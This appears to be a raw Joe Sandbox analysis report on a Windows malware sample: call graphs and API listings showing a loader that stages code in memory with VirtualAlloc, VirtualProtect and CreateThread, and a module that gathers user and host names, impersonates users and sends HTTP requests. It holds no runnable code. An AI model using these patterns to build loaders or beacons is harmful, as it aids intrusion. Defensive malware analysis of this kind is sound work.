40223->40224 40380 dbc0d3 103 API calls ___DllMainCRTStartup 40223->40380 40228 dc8722 __setmbcp 67 API calls 40224->40228 40226 db39e1 40381 dbc0fd 103 API calls 4 library calls 40226->40381 40228->40220 40382 dbefea 40229->40382 40234 dc8c0a ___DllMainCRTStartup 67 API calls 40235 db80b4 40234->40235 40394 db1311 40235->40394 40237 db80ba __RTC_InitBase 40238 db80cd 40237->40238 40239 db80d3 GetCurrentProcess 40237->40239 40397 dbe442 AllocateAndInitializeSid 40238->40397 40455 db4354 GetModuleHandleA GetProcAddress 40239->40455 40241 db80df 40241->40238 40245 db8103 40405 db242d 40245->40405 40248 db242d ___DllMainCRTStartup htonl 40249 db811f 40248->40249 40250 db242d ___DllMainCRTStartup htonl 40249->40250 40251 db812c 40250->40251 40409 db23de htonl 40251->40409 40254 db23de ___DllMainCRTStartup 2 API calls 40255 db8141 40254->40255 40412 db23fb 40255->40412 40263 db8162 _memset _realloc ___DllMainCRTStartup 40448 dbbf60 40263->40448 40265 db81a7 _memset 40265->40141 40595 dbdec2 40266->40595 40268 db2751 ___DllMainCRTStartup 40269 db27bf InternetOpenA 40268->40269 40270 db27cd InternetConnectA 40268->40270 40269->40270 40274 db281f ___DllMainCRTStartup 40270->40274 40598 dbdee3 40274->40598 40276 dbdec2 ___DllMainCRTStartup RevertToSelf 40275->40276 40277 db2e46 40276->40277 40601 db2c3f 40277->40601 40280 dbdee3 ___DllMainCRTStartup ImpersonateLoggedOnUser 40281 db2e5e 40280->40281 40281->40141 40283 dbdec2 ___DllMainCRTStartup RevertToSelf 40282->40283 40284 db287a InternetCloseHandle InternetCloseHandle 40283->40284 40287 db54ac ___DllMainCRTStartup 40285->40287 40286 db54f8 Sleep 40292 db54d5 40286->40292 40287->40286 40288 db54d0 40287->40288 40649 db5519 150 API calls 2 library calls 40287->40649 40650 db5657 77 API calls 2 library calls 40288->40650 40291 db54c7 40291->40286 40291->40288 40292->40141 40293->40095 40294->40096 40295->40102 40296->40108 40297->40111 40298->40141 40299->40141 40300->40141 40301->40138 40302->40138 40303->40138 
40304->40138 40305->40138 40306->40138 40307->40141 40308->40141 40310 dbefea ___DllMainCRTStartup 5 API calls 40309->40310 40311 db301e 40310->40311 40311->40141 40312->40120 40313->40125 40314->40170 40315->40170 40317->40167 40318->40167 40319->40176 40320->40166 40321->40163 40322->40166 40324 dc9ebe __aulldiv 40323->40324 40324->40180 40333 dcd797 40325->40333 40329 dcd797 __getptd 67 API calls 40328->40329 40330 dca0f8 40329->40330 40357 dd0331 40330->40357 40332 dca194 40332->40187 40338 dcd71e GetLastError 40333->40338 40335 dcd79f 40337 dbcb33 40335->40337 40353 dc8c6e 67 API calls 3 library calls 40335->40353 40337->40183 40339 dcd5c6 ___set_flsgetvalue 8 API calls 40338->40339 40340 dcd735 40339->40340 40341 dcd73d 40340->40341 40342 dcd78b SetLastError 40340->40342 40354 dd1852 67 API calls __calloc_impl 40341->40354 40342->40335 40344 dcd749 40344->40342 40355 dcd54b 6 API calls __crt_waiting_on_module_handle 40344->40355 40346 dcd763 40347 dcd76a 40346->40347 40348 dcd782 40346->40348 40356 dcd637 67 API calls 5 library calls 40347->40356 40350 dc8722 __setmbcp 64 API calls 40348->40350 40351 dcd788 40350->40351 40351->40342 40352 dcd772 GetCurrentThreadId 40352->40342 40353->40337 40354->40344 40355->40346 40356->40352 40358 dd0339 40357->40358 40359 dd033b IsDebuggerPresent 40357->40359 40358->40332 40365 dd2865 40359->40365 40362 dd41bf SetUnhandledExceptionFilter UnhandledExceptionFilter 40363 dd41dc __invoke_watson 40362->40363 40364 dd41e4 GetCurrentProcess TerminateProcess 40362->40364 40363->40364 40364->40332 40365->40362 40367 db13f9 40366->40367 40368 db5cd6 ___DllMainCRTStartup 40366->40368 40367->40198 40375 db8293 htons 40368->40375 40370 dc87ff _malloc 67 API calls 40374 db5cee 40370->40374 40371 db8489 htons ___DllMainCRTStartup 40371->40374 40372 dbea37 ___DllMainCRTStartup 72 API calls 40372->40374 40374->40367 40374->40370 40374->40371 40374->40372 40376 db8293 htons 40374->40376 40375->40374 40376->40374 40377->40204 40378->40214 
40379->40216 40380->40226 40381->40224 40456 dbef82 CryptAcquireContextA 40382->40456 40386 db8090 40387 dbbecf 40386->40387 40388 dbbee1 ___DllMainCRTStartup 40387->40388 40463 dc1270 40388->40463 40391 dbbefd ___DllMainCRTStartup 40393 db8099 GetCurrentProcessId GetTickCount 40391->40393 40469 dd7320 40391->40469 40474 dc8ede 67 API calls _doexit 40391->40474 40393->40234 40395 db300f ___DllMainCRTStartup 5 API calls 40394->40395 40396 db1316 40395->40396 40396->40237 40398 dbe482 CheckTokenMembership 40397->40398 40399 db80ed 40397->40399 40400 dbe497 FreeSid 40398->40400 40401 dbe494 40398->40401 40402 db23a9 40399->40402 40400->40399 40401->40400 40403 dd72d6 40402->40403 40404 db23b8 htonl 40403->40404 40404->40245 40406 db245e 40405->40406 40407 db243c _realloc 40405->40407 40406->40248 40408 db244a htonl 40407->40408 40408->40406 40410 db242d ___DllMainCRTStartup htonl 40409->40410 40411 db23f8 GetCurrentProcessId 40410->40411 40411->40254 40413 db2406 40412->40413 40414 db242d ___DllMainCRTStartup htonl 40413->40414 40415 db2418 40414->40415 40416 db241b 40415->40416 40417 db242d ___DllMainCRTStartup htonl 40416->40417 40418 db242a 40417->40418 40419 db7f09 40418->40419 40420 db81bc ___DllMainCRTStartup 67 API calls 40419->40420 40421 db7f1c ___DllMainCRTStartup 40420->40421 40422 db7f5e GetUserNameA GetComputerNameA 40421->40422 40476 db2f10 40422->40476 40425 db7fb9 GetVersionExA 40426 db241b ___DllMainCRTStartup htonl 40425->40426 40428 db7fd6 40426->40428 40427 db7f9c _strrchr 40427->40425 40429 db241b ___DllMainCRTStartup htonl 40428->40429 40430 db7fe1 40429->40430 40431 db23fb ___DllMainCRTStartup htonl 40430->40431 40432 db7fec 40431->40432 40433 db23de ___DllMainCRTStartup 2 API calls 40432->40433 40434 db7ff4 40433->40434 40435 db23de ___DllMainCRTStartup 2 API calls 40434->40435 40436 db8000 40435->40436 40437 db23de ___DllMainCRTStartup 2 API calls 40436->40437 40438 db800c 40437->40438 40439 db23de ___DllMainCRTStartup 2 API calls 40438->40439 
40440 db8015 40439->40440 40479 dc8956 40440->40479 40443 db242d ___DllMainCRTStartup htonl 40444 db8051 40443->40444 40494 db8207 40444->40494 40447 db2468 htonl 40447->40263 40449 dbbf71 ___DllMainCRTStartup 40448->40449 40519 dc0cd9 40449->40519 40451 dbbf9d 40454 dbbfc8 40451->40454 40543 dc11a5 40451->40543 40547 dc8ede 67 API calls _doexit 40451->40547 40454->40265 40455->40241 40457 dbefab CryptAcquireContextA 40456->40457 40458 dbefc2 CryptGenRandom 40456->40458 40457->40458 40459 dbefbe 40457->40459 40460 dbefd7 CryptReleaseContext 40458->40460 40461 dbefe6 40458->40461 40459->40386 40462 dbef0c GetSystemTimeAsFileTime _clock 40459->40462 40460->40459 40461->40460 40462->40386 40465 dc127b ___DllMainCRTStartup 40463->40465 40464 dc128f 40464->40391 40465->40464 40466 dc87ff _malloc 67 API calls 40465->40466 40468 dc129e 40466->40468 40467 dc8722 __setmbcp 67 API calls 40467->40464 40468->40464 40468->40467 40472 dd7344 ___DllMainCRTStartup 40469->40472 40471 dd7b1f 40471->40391 40473 dd7960 40472->40473 40475 dd8df9 28 API calls _RTC_Failure 40472->40475 40473->40391 40474->40391 40475->40471 40500 db2f1b 40476->40500 40480 dc8966 40479->40480 40481 dc8983 40479->40481 40513 dca641 67 API calls __getptd_noexit 40480->40513 40483 dc89af 40481->40483 40485 dc8992 40481->40485 40517 dcb90b 103 API calls 15 library calls 40483->40517 40484 dc896b 40514 dcc5da 6 API calls 2 library calls 40484->40514 40515 dca641 67 API calls __getptd_noexit 40485->40515 40489 dc89dd 40491 db802d 40489->40491 40518 dcb7a7 101 API calls 6 library calls 40489->40518 40490 dc8997 40516 dcc5da 6 API calls 2 library calls 40490->40516 40491->40443 40495 db8215 ___DllMainCRTStartup 40494->40495 40496 dc8722 __setmbcp 67 API calls 40495->40496 40497 db821c 40496->40497 40498 dc8722 __setmbcp 67 API calls 40497->40498 40499 db805a 40498->40499 40499->40447 40507 db2e6e 40500->40507 40502 db2f36 WSASocketA 40503 db2f18 GetModuleFileNameA 40502->40503 40504 db2f50 WSAIoctl 40502->40504 
40503->40427 40506 db2f74 closesocket 40504->40506 40506->40503 40508 db2e83 WSAStartup 40507->40508 40511 db2ea5 ___DllMainCRTStartup 40507->40511 40509 db2e99 WSACleanup 40508->40509 40508->40511 40512 dc8ede 67 API calls _doexit 40509->40512 40511->40502 40512->40511 40513->40484 40515->40490 40517->40489 40518->40491 40548 dc199b 40519->40548 40525 dc0dd8 40526 dc0e67 40525->40526 40530 dc0de3 40525->40530 40527 dc8722 __setmbcp 67 API calls 40526->40527 40528 dc0e6f 40527->40528 40561 dc1e70 67 API calls 3 library calls 40528->40561 40560 dc1e70 67 API calls 3 library calls 40530->40560 40532 dc0e85 40538 dc0f39 40532->40538 40539 dc0ea6 40532->40539 40542 dc0d49 ___DllMainCRTStartup 40532->40542 40533 dc0e41 40534 dc0e4e 40533->40534 40535 dc0e59 40533->40535 40536 dc8722 __setmbcp 67 API calls 40534->40536 40537 dc8722 __setmbcp 67 API calls 40535->40537 40536->40542 40537->40542 40538->40542 40563 dc1e70 67 API calls 3 library calls 40538->40563 40539->40542 40562 dc1e70 67 API calls 3 library calls 40539->40562 40542->40451 40544 dc11b5 ___DllMainCRTStartup 40543->40544 40546 dc11d6 40544->40546 40588 dc1f72 40544->40588 40546->40451 40547->40451 40549 dc19a9 40548->40549 40550 dc0d29 40548->40550 40549->40550 40564 dc3ef7 40549->40564 40550->40542 40552 dd6990 40550->40552 40567 dd611c 40552->40567 40554 dd69aa 40558 dc0d40 40554->40558 40580 dca641 67 API calls __getptd_noexit 40554->40580 40556 dd69bd 40556->40558 40581 dca641 67 API calls __getptd_noexit 40556->40581 40558->40542 40559 dc1a0c 5 API calls ___DllMainCRTStartup 40558->40559 40559->40525 40560->40533 40561->40532 40562->40542 40563->40542 40565 dc87ff _malloc 67 API calls 40564->40565 40566 dc3f03 40565->40566 40566->40549 40568 dd6128 __setmbcp 40567->40568 40569 dd615f _memset 40568->40569 40570 dd6140 40568->40570 40574 dd61d1 RtlAllocateHeap 40569->40574 40575 dd6155 __setmbcp 40569->40575 40584 dca8aa 67 API calls 2 library calls 40569->40584 40585 dcb0bc 5 API calls 2 library calls 
40569->40585 40586 dd6218 LeaveCriticalSection _doexit 40569->40586 40587 dcb77f 6 API calls __decode_pointer 40569->40587 40582 dca641 67 API calls __getptd_noexit 40570->40582 40572 dd6145 40583 dcc5da 6 API calls 2 library calls 40572->40583 40574->40569 40575->40554 40580->40556 40581->40558 40582->40572 40584->40569 40585->40569 40586->40569 40587->40569 40589 dc1f7f ___DllMainCRTStartup 40588->40589 40590 dc1fa2 _realloc 40589->40590 40592 dc1165 40589->40592 40590->40546 40593 dbefea ___DllMainCRTStartup 5 API calls 40592->40593 40594 dc1173 40593->40594 40594->40590 40596 dbdecb RevertToSelf 40595->40596 40597 dbded1 40595->40597 40596->40597 40597->40268 40599 dbdeec ImpersonateLoggedOnUser 40598->40599 40600 db285d 40598->40600 40599->40600 40600->40141 40602 db2c85 _memset 40601->40602 40640 db9c49 40602->40640 40604 db2c95 40605 dc8956 __snprintf 103 API calls 40604->40605 40606 db2cac ___DllMainCRTStartup 40605->40606 40644 db95f6 40606->40644 40608 db2cce 40609 db2d01 40608->40609 40610 db5eec ___DllMainCRTStartup 103 API calls 40608->40610 40612 db2d2d 40609->40612 40613 db2d1d 40609->40613 40611 db2ceb 40610->40611 40614 db5fb6 ___DllMainCRTStartup 103 API calls 40611->40614 40616 dc8956 __snprintf 103 API calls 40612->40616 40615 dc8956 __snprintf 103 API calls 40613->40615 40614->40609 40617 db2d28 ___DllMainCRTStartup 40615->40617 40616->40617 40618 db2d62 HttpOpenRequestA 40617->40618 40619 db28bc ___DllMainCRTStartup InternetQueryOptionA InternetSetOptionA InternetSetStatusCallback 40618->40619 40620 db2d77 HttpSendRequestA 40619->40620 40622 db9cc6 ___DllMainCRTStartup 67 API calls 40620->40622 40623 db2da0 40622->40623 40624 db291b ___DllMainCRTStartup HttpQueryInfoA 40623->40624 40625 db2da6 40624->40625 40626 db2dab 40625->40626 40627 db2db9 InternetQueryDataAvailable 40625->40627 40628 db2dae InternetCloseHandle 40626->40628 40629 db2dca 40627->40629 40630 db2e2e InternetCloseHandle 40627->40630 40631 db2e38 40628->40631 40629->40630 40632 
db2dd2 40629->40632 40630->40631 40631->40280 40632->40626 40632->40628 40633 db2ddb InternetReadFile 40632->40633 40634 db2e08 40633->40634 40635 db2df8 40633->40635 40634->40626 40636 db2e0d InternetCloseHandle 40634->40636 40635->40633 40635->40634 40637 db2e1f ___DllMainCRTStartup 40636->40637 40638 db9afe ___DllMainCRTStartup 68 API calls 40637->40638 40639 db2e2a 40638->40639 40639->40631 40641 db9c58 40640->40641 40642 db81bc ___DllMainCRTStartup 67 API calls 40641->40642 40643 db9c6f ___DllMainCRTStartup 40642->40643 40643->40604 40645 db961c _memset ___DllMainCRTStartup 40644->40645 40647 db9656 40645->40647 40648 db8250 htonl 40645->40648 40647->40647 40648->40645 40649->40291 40650->40292 40651 4017ac malloc 40652 4017c2 Sleep 40651->40652 40658 401700 CreateFileA 40652->40658 40655 4017e5 40663 40156c VirtualAlloc 40655->40663 40657 4017fe 40659 4017a4 40658->40659 40660 40175f 40658->40660 40659->40652 40659->40655 40661 401763 ReadFile 40660->40661 40662 40178a CloseHandle 40660->40662 40661->40660 40661->40662 40662->40659 40664 40159f 40663->40664 40665 4015c2 VirtualProtect CreateThread 40664->40665 40665->40657 40666 401530 40665->40666

                            Control-flow Graph

                            APIs
                            • _memset.LIBCMT ref: 00DB2C80
                            • __snprintf.LIBCMT ref: 00DB2CA7
                              • Part of subcall function 00DB95F6: _memset.LIBCMT ref: 00DB9617
                            • __snprintf.LIBCMT ref: 00DB2D23
                            • __snprintf.LIBCMT ref: 00DB2D3A
                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00DE1540,00DEFFC4), ref: 00DB2D69
                            • HttpSendRequestA.WININET(00000000,?,?,00DB2E54,?), ref: 00DB2D92
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2DAF
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5EFC
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB5EEC: __snprintf.LIBCMT ref: 00DB5F59
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F90
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F9B
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FC6
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB5FB6: __snprintf.LIBCMT ref: 00DB602E
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB604C
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB6057
                            • InternetQueryDataAvailable.WININET(00000000,00DB158B,00000000,00000000), ref: 00DB2DC0
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00DB2DEE
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E0E
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                            • String ID: %s%s$*/*
                            • API String ID: 2172916581-856325523
                            • Opcode ID: a307bf958a50ea51b03ddb6392535589610dd15a020d1c8808cec29aba166382
                            • Instruction ID: b5d233cf7fad8aab5e8b8d5a585120e5f14a14f72ec0b6661b5db1504d37f184
                            • Opcode Fuzzy Hash: a307bf958a50ea51b03ddb6392535589610dd15a020d1c8808cec29aba166382
                            • Instruction Fuzzy Hash: 4E519D72900219FFDF11AFA5DC85EFEBBB9EB04310B04446AF516A7261DA309A45CBB4

                            Control-flow Graph

                            APIs
                            • _memset.LIBCMT ref: 00DB2C80
                            • __snprintf.LIBCMT ref: 00DB2CA7
                              • Part of subcall function 00DB95F6: _memset.LIBCMT ref: 00DB9617
                            • __snprintf.LIBCMT ref: 00DB2D23
                            • __snprintf.LIBCMT ref: 00DB2D3A
                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00DE1540,00DEFFC4), ref: 00DB2D69
                            • HttpSendRequestA.WININET(00000000,?,?,00DB2E54,?), ref: 00DB2D92
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2DAF
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5EFC
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB5EEC: __snprintf.LIBCMT ref: 00DB5F59
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F90
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F9B
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FC6
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB5FB6: __snprintf.LIBCMT ref: 00DB602E
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB604C
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB6057
                            • InternetQueryDataAvailable.WININET(00000000,00DB158B,00000000,00000000), ref: 00DB2DC0
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00DB2DEE
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E0E
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                            • String ID: %s%s$*/*
                            • API String ID: 2172916581-856325523
                            • Opcode ID: f2261827d8974748310db327985d8dd93d49b4ee832212f1f452f378845dce21
                            • Instruction ID: b5d233cf7fad8aab5e8b8d5a585120e5f14a14f72ec0b6661b5db1504d37f184
                            • Opcode Fuzzy Hash: f2261827d8974748310db327985d8dd93d49b4ee832212f1f452f378845dce21
                            • Instruction Fuzzy Hash: 4E519D72900219FFDF11AFA5DC85EFEBBB9EB04310B04446AF516A7261DA309A45CBB4

                            Control-flow Graph

                            control_flow_graph for function 0040116c (basic-block graph; legend: Executed / Not Executed; the rendered graph is not reproduced here). Blocks with calls: 401430-40143c GetStartupInfoA; 4011b0-4011b9 Sleep; 4013db-4013ef _amsg_exit; 4013f5-401415 _initterm; 401460-401479 _initterm; 40148b-40149a exit; 40122c-40126c call 401e20, SetUnhandledExceptionFilter, call 4029d0, call 401c70, __p__acmdln; 4012db-4012fb malloc; 401310-401344 strlen malloc memcpy; 401346-401393 call 401960, call 4029e0; 401448-40145d _cexit.
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                            • String ID:
                            • API String ID: 1672962128-0
                            • Opcode ID: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
                            • Instruction ID: cd1cdbe7929d0bdf955f1aec1ac9dc0fa1fb6e5342f4dd5585025b5f235b2fbc
                            • Opcode Fuzzy Hash: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
                            • Instruction Fuzzy Hash: 13817BB5A043058FDB10DF69E98476E77E0FB49305F00443EEA84AB3A2D779D845CB8A

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • GetUserNameA.ADVAPI32(?,?), ref: 00DB7F6E
                            • GetComputerNameA.KERNEL32(?,?), ref: 00DB7F7E
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7F92
                            • _strrchr.LIBCMT ref: 00DB7FA1
                            • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7FBC
                            • __snprintf.LIBCMT ref: 00DB8028
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                            • String ID: %s%s%s
                            • API String ID: 1877169212-1891519693
                            • Opcode ID: 9b48ae569941062a8ba7aa3ac8932514c71d4a8eeed8b60b5f5f3d8e69d11342
                            • Instruction ID: 051df6b8c47dd3ac032988e7781ad838a73aac6732b36ed9eced96f1f2c9f4a9
                            • Opcode Fuzzy Hash: 9b48ae569941062a8ba7aa3ac8932514c71d4a8eeed8b60b5f5f3d8e69d11342
                            • Instruction Fuzzy Hash: 5A418A72D00205EECF11AFA1EC4A9FEBFB8EF04710F10445AF401A6291DB758A41EB70

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • GetUserNameA.ADVAPI32(?,?), ref: 00DB7F6E
                            • GetComputerNameA.KERNEL32(?,?), ref: 00DB7F7E
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7F92
                            • _strrchr.LIBCMT ref: 00DB7FA1
                            • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00DB7FBC
                            • __snprintf.LIBCMT ref: 00DB8028
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                            • String ID: %s%s%s
                            • API String ID: 1877169212-1891519693
                            • Opcode ID: 39aaea07771c17afe4aa773ca0ad8f35589e51179ff3fcfdb541bfce4877fe4f
                            • Instruction ID: 051df6b8c47dd3ac032988e7781ad838a73aac6732b36ed9eced96f1f2c9f4a9
                            • Opcode Fuzzy Hash: 39aaea07771c17afe4aa773ca0ad8f35589e51179ff3fcfdb541bfce4877fe4f
                            • Instruction Fuzzy Hash: 5A418A72D00205EECF11AFA1EC4A9FEBFB8EF04710F10445AF401A6291DB758A41EB70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 204 4013c1-4013d5 206 4011da-4011e1 204->206 207 4013db-4013ef _amsg_exit 204->207 210 401460-401479 _initterm 206->210 211 4011e7-4011f9 206->211 208 4013f5-401415 _initterm 207->208 209 4011ff-401201 207->209 212 401207-40120e 208->212 213 40141b-401421 208->213 209->212 209->213 214 401483 210->214 211->208 211->209 215 401210-401229 212->215 216 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 212->216 213->212 218 40148b-40149a exit 214->218 215->216 225 401281-401287 216->225 226 40126e 216->226 228 401270-401272 225->228 229 401289-401294 225->229 227 4012bd-4012c5 226->227 230 4012c7-4012d0 227->230 231 4012db-4012fb malloc 227->231 232 401274-401277 228->232 233 4012b8 228->233 234 40127e 229->234 235 4012d6 230->235 236 4013b8-4013bc 230->236 231->214 237 401301-40130d 231->237 238 4012a0-4012a2 232->238 239 401279 232->239 233->227 234->225 235->231 236->235 240 401310-401344 strlen malloc memcpy 237->240 238->233 241 4012a4 238->241 239->234 240->240 242 401346-401381 call 401960 call 4029e0 240->242 243 4012a8-4012b1 241->243 248 401386-401393 242->248 243->233 245 4012b3-4012b6 243->245 245->233 245->243 248->218 249 401399-4013a1 248->249 250 4013a7-4013b2 249->250 251 401448-40145d _cexit 249->251
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
                            • String ID:
                            • API String ID: 2053141405-0
                            • Opcode ID: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
                            • Instruction ID: 176527dceee54676b3400d832f202c7b1996cfd354b1dcf2f579e8dd7b9a5ba8
                            • Opcode Fuzzy Hash: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
                            • Instruction Fuzzy Hash: 974118B4A043058FDB10EF65E98575EBBE0FB48705F10843EE984A73A2D7B8D845CB59

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 252 4011a3-4011a7 253 4011a8-4011aa 252->253 254 4011b0-4011c8 Sleep 253->254 255 4013c8-4013d5 253->255 254->253 261 4011ca-4011d4 254->261 257 4011da-4011e1 255->257 258 4013db-4013ef _amsg_exit 255->258 262 401460-401479 _initterm 257->262 263 4011e7-4011f9 257->263 259 4013f5-401415 _initterm 258->259 260 4011ff-401201 258->260 264 401207-40120e 259->264 265 40141b-401421 259->265 260->264 260->265 261->257 261->258 266 401483 262->266 263->259 263->260 267 401210-401229 264->267 268 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 264->268 265->264 270 40148b-40149a exit 266->270 267->268 277 401281-401287 268->277 278 40126e 268->278 280 401270-401272 277->280 281 401289-401294 277->281 279 4012bd-4012c5 278->279 282 4012c7-4012d0 279->282 283 4012db-4012fb malloc 279->283 284 401274-401277 280->284 285 4012b8 280->285 286 40127e 281->286 287 4012d6 282->287 288 4013b8-4013bc 282->288 283->266 289 401301-40130d 283->289 290 4012a0-4012a2 284->290 291 401279 284->291 285->279 286->277 287->283 288->287 292 401310-401344 strlen malloc memcpy 289->292 290->285 293 4012a4 290->293 291->286 292->292 294 401346-401393 call 401960 call 4029e0 292->294 295 4012a8-4012b1 293->295 294->270 301 401399-4013a1 294->301 295->285 297 4012b3-4012b6 295->297 297->285 297->295 302 4013a7-4013b2 301->302 303 401448-40145d _cexit 301->303
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
                            • String ID:
                            • API String ID: 2230096795-0
                            • Opcode ID: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
                            • Instruction ID: ee64299d2f4f8c50c0c592fa26e83c8470f2d6fe6e7dfb634f206cb54a3f681e
